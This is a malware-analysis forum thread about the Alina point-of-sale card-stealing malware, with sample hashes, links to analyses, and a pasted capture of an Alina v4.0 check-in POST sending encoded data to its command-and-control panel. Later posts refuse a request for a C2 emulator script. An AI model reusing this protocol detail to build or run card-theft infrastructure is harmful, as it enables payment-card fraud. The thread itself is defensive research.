A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #18160  by blake
 Mon Feb 11, 2013 6:12 pm
Buster_BSA wrote:An analysis of alina here:
http://myexperimentswithmalware.blogspo ... chive.html
The purpose of Alina is to monitor for credit card information.
As evidence review this:

and this:
 #18161  by Xylitol
 Mon Feb 11, 2013 8:51 pm
Symantec discovered Alina :)) http://www.symantec.com/security_respon ... 12-1503-99
And about Alina... seem the v4.0 is out.
https://www.virustotal.com/file/102fa9c ... 360615660/
Code: Select all
POST /e107/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v4.0
Content-Length: 360
Cache-Control: no-cache
act=l&b=1140f588&c=pc0&v=v4.0&p=C:\102fa9c066.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1caddca85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f79a9b99cdca92c89b9d9d85ced3cea1HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 11 Feb 2013 20:49:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

No admin password record found.
Edit: both paths and answers on and proxies or just a synchro ?!
You do not have the required permissions to view the files attached to this post.
 #18212  by Xylitol
 Fri Feb 15, 2013 10:11 am
https://www.virustotal.com/file/af35e64 ... 360596995/
https://www.virustotal.com/file/180ed8d ... 360596997/
i don't know the password for these, refere here: http://www.xylibox.com/2013/02/youre-va ... arder.html

Two files from https://www.trustwave.com/downloads/spi ... e_2010.pdf
https://www.virustotal.com/fr/file/b5c5 ... 360922618/
https://www.virustotal.com/fr/file/b532 ... 360922618/
Unfortunately cant find ramsys32.sys
AV seem don't know thems and i've mailed trustwave but they can't share sample.
Bad, because that seem very interesting.

And card recon:
https://www.virustotal.com/fr/file/ce44 ... 360923042/
i hope AV will wake up and flag all that as unwanted/malware
You do not have the required permissions to view the files attached to this post.
 #18503  by bobodoc
 Tue Mar 12, 2013 10:01 pm
exitthematrix wrote:
mikeinhouston wrote:exitthematrix,

Is the encryption key stored 16 bytes before the Run key's name in the iexplore.exe memory (dump)?
Depends on sample, just looked at "cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785" dump and the KEY is located 8 bytes before the MUTEX name.

BTW, got anybody the PHP panel?

Anyway, I wrote a shitty but half-functional "gateway.php" to fully find out how the bot is functioning (everything work besides the commands, I didn't test them). PM if need the script.
I can't pm you, but can you pm with a contact id ?
 #18507  by bsteo
 Wed Mar 13, 2013 12:30 pm
For what? If you think I'm a POS malware bad guys helper you're wrong. Don't get me wrong, but your first post here is about how to send me PM to give you some script. I fight malware.
 #18509  by EP_X0FF
 Wed Mar 13, 2013 1:26 pm
bobodoc wrote:I can't pm you, but can you pm with a contact id ?
Users with low or zero count of posts cannot use PM.

This board was built on principles of sharing knowledge, not playing in spy games.

We do not create malware here, do not support malware and do not consult how to use it for your own needs.

This particular subforum focuses on reversing, tracking and identifying different malware with open discussion and samples free for download for every registered member. Registration is also free as you already know.

If you have specific question -> post it and show what you already have done, maybe somebody can help you. Otherwise -> go away.
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11
  • 25